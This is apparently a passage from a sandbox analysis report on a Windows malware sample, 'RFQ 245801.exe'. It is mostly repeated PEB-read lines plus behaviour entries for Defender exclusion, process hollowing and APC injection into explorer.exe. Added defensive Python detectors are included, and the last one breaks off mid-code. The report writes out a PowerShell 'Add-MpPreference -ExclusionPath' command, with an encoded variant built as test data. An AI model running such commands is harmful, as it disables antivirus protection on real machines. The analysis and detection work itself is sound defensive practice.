Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F4940 mov eax, dword ptr fs:[00000030h] 5_2_017F4940
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A892A mov eax, dword ptr fs:[00000030h] 5_2_017A892A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B892B mov eax, dword ptr fs:[00000030h] 5_2_017B892B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AC912 mov eax, dword ptr fs:[00000030h] 5_2_017AC912
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01718918 mov eax, dword ptr fs:[00000030h] 5_2_01718918
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01718918 mov eax, dword ptr fs:[00000030h] 5_2_01718918
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h] 5_2_0179E908
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h] 5_2_0179E908
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h] 5_2_017529F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h] 5_2_017529F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AE9E0 mov eax, dword ptr fs:[00000030h] 5_2_017AE9E0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h] 5_2_0172A9D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h] 5_2_0172A9D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h] 5_2_0172A9D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h] 5_2_0172A9D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h] 5_2_0172A9D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h] 5_2_0172A9D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017549D0 mov eax, dword ptr fs:[00000030h] 5_2_017549D0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EA9D3 mov eax, dword ptr fs:[00000030h] 5_2_017EA9D3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B69C0 mov eax, dword ptr fs:[00000030h] 5_2_017B69C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A89B3 mov esi, dword ptr fs:[00000030h] 5_2_017A89B3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h] 5_2_017A89B3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h] 5_2_017A89B3
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h] 5_2_017329A0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017209AD mov eax, dword ptr fs:[00000030h] 5_2_017209AD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017209AD mov eax, dword ptr fs:[00000030h] 5_2_017209AD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h] 5_2_017AE872
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h] 5_2_017AE872
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h] 5_2_017B6870
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h] 5_2_017B6870
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01750854 mov eax, dword ptr fs:[00000030h] 5_2_01750854
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01724859 mov eax, dword ptr fs:[00000030h] 5_2_01724859
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01724859 mov eax, dword ptr fs:[00000030h] 5_2_01724859
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01732840 mov ecx, dword ptr fs:[00000030h] 5_2_01732840
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h] 5_2_01742835
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h] 5_2_01742835
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h] 5_2_01742835
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742835 mov ecx, dword ptr fs:[00000030h] 5_2_01742835
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h] 5_2_01742835
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01742835 mov eax, dword ptr fs:[00000030h] 5_2_01742835
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175A830 mov eax, dword ptr fs:[00000030h] 5_2_0175A830
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C483A mov eax, dword ptr fs:[00000030h] 5_2_017C483A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C483A mov eax, dword ptr fs:[00000030h] 5_2_017C483A
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AC810 mov eax, dword ptr fs:[00000030h] 5_2_017AC810
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h] 5_2_0175C8F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h] 5_2_0175C8F9
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EA8E4 mov eax, dword ptr fs:[00000030h] 5_2_017EA8E4
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174E8C0 mov eax, dword ptr fs:[00000030h] 5_2_0174E8C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F08C0 mov eax, dword ptr fs:[00000030h] 5_2_017F08C0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017AC89D mov eax, dword ptr fs:[00000030h] 5_2_017AC89D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720887 mov eax, dword ptr fs:[00000030h] 5_2_01720887
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0171CB7E mov eax, dword ptr fs:[00000030h] 5_2_0171CB7E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01718B50 mov eax, dword ptr fs:[00000030h] 5_2_01718B50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h] 5_2_017F2B57
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h] 5_2_017F2B57
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h] 5_2_017F2B57
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h] 5_2_017F2B57
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CEB50 mov eax, dword ptr fs:[00000030h] 5_2_017CEB50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h] 5_2_017D4B4B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h] 5_2_017D4B4B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h] 5_2_017B6B40
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h] 5_2_017B6B40
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017EAB40 mov eax, dword ptr fs:[00000030h] 5_2_017EAB40
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017C8B42 mov eax, dword ptr fs:[00000030h] 5_2_017C8B42
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h] 5_2_0174EB20
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h] 5_2_0174EB20
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h] 5_2_017E8B28
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h] 5_2_017E8B28
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h] 5_2_0179EB1D
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017F4B00 mov eax, dword ptr fs:[00000030h] 5_2_017F4B00
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h] 5_2_01728BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h] 5_2_01728BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h] 5_2_01728BF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174EBFC mov eax, dword ptr fs:[00000030h] 5_2_0174EBFC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017ACBF0 mov eax, dword ptr fs:[00000030h] 5_2_017ACBF0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CEBD0 mov eax, dword ptr fs:[00000030h] 5_2_017CEBD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h] 5_2_01740BCB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h] 5_2_01740BCB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h] 5_2_01740BCB
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h] 5_2_01720BCD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h] 5_2_01720BCD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h] 5_2_01720BCD
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h] 5_2_01730BBE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h] 5_2_01730BBE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h] 5_2_017D4BB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h] 5_2_017D4BB0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h] 5_2_0179CA72
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h] 5_2_0179CA72
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h] 5_2_0175CA6F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h] 5_2_0175CA6F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h] 5_2_0175CA6F
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017CEA60 mov eax, dword ptr fs:[00000030h] 5_2_017CEA60
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h] 5_2_01726A50
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h] 5_2_01730A5B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h] 5_2_01730A5B
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h] 5_2_01744A35
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h] 5_2_01744A35
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175CA24 mov eax, dword ptr fs:[00000030h] 5_2_0175CA24
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0174EA2E mov eax, dword ptr fs:[00000030h] 5_2_0174EA2E
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_017ACA11 mov eax, dword ptr fs:[00000030h] 5_2_017ACA11
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h] 5_2_0175AAEE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h] 5_2_0175AAEE
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01720AD0 mov eax, dword ptr fs:[00000030h] 5_2_01720AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h] 5_2_01754AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h] 5_2_01754AD0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h] 5_2_01776ACC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h] 5_2_01776ACC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h] 5_2_01776ACC
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h] 5_2_01728AA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h] 5_2_01728AA0
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01776AA4 mov eax, dword ptr fs:[00000030h] 5_2_01776AA4
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_01758A90 mov edx, dword ptr fs:[00000030h] 5_2_01758A90
Source: C:\Users\user\Desktop\RFQ 245801.exe Code function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h] 5_2_0172EA80
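Every `mov eax, dword ptr fs:[00000030h]` (and the ecx/edx/ebx/esi variants) listed above is a read of the PEB pointer from the TEB, the usual first step of a PEB.BeingDebugged (offset 2) or PEB.NtGlobalFlag (offset 0x68) check on 32-bit Windows. The Python below is an added example, not part of the Joe Sandbox report or of the sample, showing how such hits are located statically: it scans raw x86 bytes for the two encodings of `mov r32, fs:[30h]` and ignores other fs-relative reads such as fs:[18h]. The code bytes it scans are constructed here to mimic a typical check and are not extracted from RFQ 245801.exe; the base address passed in is only illustrative.

```python
"""Static scan for x86 reads of the PEB pointer (`mov r32, dword ptr fs:[30h]`).

Added example; the scanned bytes are constructed, not taken from the analysed sample.
"""
import struct

PEB_OFFSET = 0x30       # TEB+0x30 holds the PEB pointer on 32-bit Windows
REG32 = {0: "eax", 1: "ecx", 2: "edx", 3: "ebx", 4: "esp", 5: "ebp", 6: "esi", 7: "edi"}


def find_peb_reads(code: bytes, base: int = 0):
    """Return [(address, register)] for every `mov r32, fs:[30h]` found in `code`.

    Two encodings are matched, both behind the 0x64 (fs) segment prefix:
      64 A1 <disp32>          mov eax, fs:[disp32]   (moffs form, eax only)
      64 8B <modrm> <disp32>  mov r32, fs:[disp32]   (modrm: mod=00, rm=101)
    This is a byte-pattern scan, not a disassembly, so treat hits as a heuristic.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x64:
            i += 1
            continue
        if i + 6 <= n and code[i + 1] == 0xA1:
            disp = struct.unpack_from("<I", code, i + 2)[0]
            if disp == PEB_OFFSET:
                hits.append((base + i, "eax"))
            i += 6
            continue
        if i + 7 <= n and code[i + 1] == 0x8B:
            modrm = code[i + 2]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 0 and rm == 5:
                disp = struct.unpack_from("<I", code, i + 3)[0]
                if disp == PEB_OFFSET:
                    hits.append((base + i, REG32[reg]))
                i += 7
                continue
        i += 1
    return hits


# Constructed code bytes mimicking a typical debugger check (not from RFQ 245801.exe).
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"               # push ebp ; mov ebp, esp
    "64 A1 30 00 00 00"      # mov eax, dword ptr fs:[30h]    -> PEB
    "8A 40 02"               # mov al, byte ptr [eax+2]       -> PEB.BeingDebugged
    "84 C0"                  # test al, al
    "64 8B 0D 30 00 00 00"   # mov ecx, dword ptr fs:[30h]    -> PEB
    "8B 49 68"               # mov ecx, dword ptr [ecx+68h]   -> PEB.NtGlobalFlag
    "64 A1 18 00 00 00"      # mov eax, dword ptr fs:[18h]    -> TEB self pointer, ignored
    "5D C3"                  # pop ebp ; ret
)

if __name__ == "__main__":
    for addr, reg in find_peb_reads(SAMPLE_CODE, base=0x017DA456):
        print(f"{addr:08X} mov {reg}, dword ptr fs:[00000030h]")
```

Legitimate code (CRT start-up, compiler-emitted SEH and TLS helpers, loader stubs) reads fs:[30h] as well, so the number of hits is not by itself evidence of anti-debugging; what matters is what the code does with the pointer next, such as the [eax+2] (BeingDebugged) and [ecx+68h] (NtGlobalFlag) reads in the constructed bytes.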
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00642167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree, 7_2_00642167
Source: C:\Users\user\Desktop\RFQ 245801.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\RFQ 245801.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00645DC0 SetUnhandledExceptionFilter, 7_2_00645DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 7_2_00645C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00645C30
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
Source: C:\Users\user\Desktop\RFQ 245801.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
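The powershell.exe command line above adds the sample's own path to the Defender exclusion list (`Add-MpPreference -ExclusionPath`), and the Sigma rule named in the overview also covers the base64 `-EncodedCommand` form of the same cmdlet. The Python below is an added example, not part of the report, that applies that check to constructed process-creation events modelled on this line: it decodes `-EncodedCommand` arguments (base64 of UTF-16LE) before matching, extracts the excluded path, and keeps the parent image, since an executable on the user's Desktop spawning this cmdlet is the telling part. The field names (ParentImage, Image, CommandLine) follow Sysmon event 1 naming; the events themselves are constructed, not taken from the analysis.

```python
"""Flag Defender exclusion tampering in PowerShell process-creation events,
including the base64 -EncodedCommand (UTF-16LE) form.

Added example with constructed events; field names follow Sysmon event 1.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
# Add-/Set-MpPreference followed, within the same pipeline element, by a weakening switch.
MP_TAMPER = re.compile(
    r"(?i)\b(?:Add|Set)-MpPreference\b[^|;]*?-(?:ExclusionPath|ExclusionProcess|"
    r"ExclusionExtension|ExclusionIpAddress|DisableRealtimeMonitoring|DisableIOAVProtection)\b"
)
EXCLUDED_PATH = re.compile(r"""(?i)-ExclusionPath\s+(?:"([^"]*)"|'([^']*)'|(\S+))""")


def encode_powershell(script: str) -> str:
    """Produce a -EncodedCommand argument the way powershell.exe expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def check_event(event: dict):
    """Return a finding dict for a Defender-tampering PowerShell launch, else None."""
    if not is_powershell(event["Image"]):
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    script = decoded if decoded is not None else event["CommandLine"]
    m = MP_TAMPER.search(script)
    if not m:
        return None
    p = EXCLUDED_PATH.search(script)
    path = next((g for g in p.groups() if g), None) if p else None
    return {
        "rule": "defender_preference_tamper",
        "parent": event["ParentImage"],
        "encoded": decoded is not None,
        "match": m.group(0),
        "path": path,
    }


def scan(events):
    return [f for f in map(check_event, events) if f]


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [   # constructed, modelled on the report's process-creation line
    {"ParentImage": r"C:\Users\user\Desktop\RFQ 245801.exe", "Image": PS,
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"'},
    {"ParentImage": r"C:\Users\user\Desktop\RFQ 245801.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_powershell(r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"')},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe Get-MpPreference | Select-Object ExclusionPath"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The decode step is what separates this from a plain string match: an encoded launch never contains the literal text `Add-MpPreference` in its command line, so a rule that only inspects the raw command line misses it. Matching the parent image against the excluded path (here both are RFQ 245801.exe) is a further high-confidence signal that a process is excluding itself.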
Source: C:\Users\user\Desktop\RFQ 245801.exe NtQueueApcThread: Indirect: 0x1B9A4F2
Source: C:\Users\user\Desktop\RFQ 245801.exe NtClose: Indirect: 0x1B9A56C
Source: C:\Users\user\Desktop\RFQ 245801.exe Memory written: C:\Users\user\Desktop\RFQ 245801.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ 245801.exe Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread register set: target process: 2580
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 2580
Source: C:\Users\user\Desktop\RFQ 245801.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\RFQ 245801.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 640000
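The lines above (a write at the child's image base 0x400000 that begins with 4D5A, a thread context set in another process, a section unmapped in NETSTAT.EXE, RWX sections mapped into explorer.exe and an APC queued there) are the footprint of process hollowing followed by APC injection. The Python below is an added example, not part of the report, of correlating such cross-process API events into findings: a constructed event list modelled on this report (the pids, the CREATE_SUSPENDED flag and the call arguments are assumptions, not values from the analysis) is reduced to abstract stages per (source, target) pair, and a technique is reported only when its required stages occur in order.

```python
"""Correlate cross-process API events into process-hollowing / APC-injection findings.

Added example; the event list is constructed and modelled on this report's
behaviour lines (pids, flags and call arguments are assumptions).
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004

TECHNIQUES = {
    # required stages must all be present, in this order, for one (source, target) pair
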